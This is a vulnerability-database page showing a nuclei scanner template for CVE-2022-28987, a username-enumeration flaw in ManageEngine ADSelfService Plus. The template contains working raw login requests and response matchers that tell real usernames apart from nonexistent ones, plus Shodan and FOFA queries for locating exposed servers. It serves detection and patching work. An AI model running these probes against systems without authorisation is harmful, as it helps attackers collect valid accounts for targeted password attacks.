Lucene search
K

Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Zoho ManageEngine ADSelfService Plus 6121 has username enumeration (CVE-2022-28987); update to 6202+.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-28987
20 May 202203:15
attackerkb
Circl
CVE-2022-28987
20 May 202207:30
circl
CNNVD
ZOHO ManageEngine ADSelfService Plus 安全漏洞
20 May 202200:00
cnnvd
CVE
CVE-2022-28987
20 May 202202:10
cve
Cvelist
CVE-2022-28987
20 May 202202:10
cvelist
EUVD
EUVD-2022-33418
3 Oct 202520:07
euvd
NVD
CVE-2022-28987
20 May 202203:15
nvd
OSV
CVE-2022-28987
20 May 202203:15
osv
Prion
Design/Logic Flaw
20 May 202203:15
prion
Positive Technologies
PT-2022-19345
20 May 202200:00
ptsecurity
Rows per page
id: CVE-2022-28987

info:
  name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
  impact: |
    Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
  remediation: |
    Update to version 6202 or later.
  reference:
    - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28987
    epss-score: 0.09705
    epss-percentile: 0.94914
    cwe-id: CWE-203
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.title:"ADSelfService Plus"
    fofa-query: title="ADSelfService Plus"
  tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice,vkev

http:
  - raw:
      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=asdfnonexistent

      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=Guest

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Permission Denied")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Your account has been disabled")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220167ffa80a6eb52f1cb0d41732c412254305473e40c6a8b18c9cb1ebb5a5d108f022057fb8a33a2dd2d93255ef3263cbab5c95e3bffa9e7be6932b6e28afb9cdce9e8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 25
CVSS 3.15.3
EPSS0.09705
13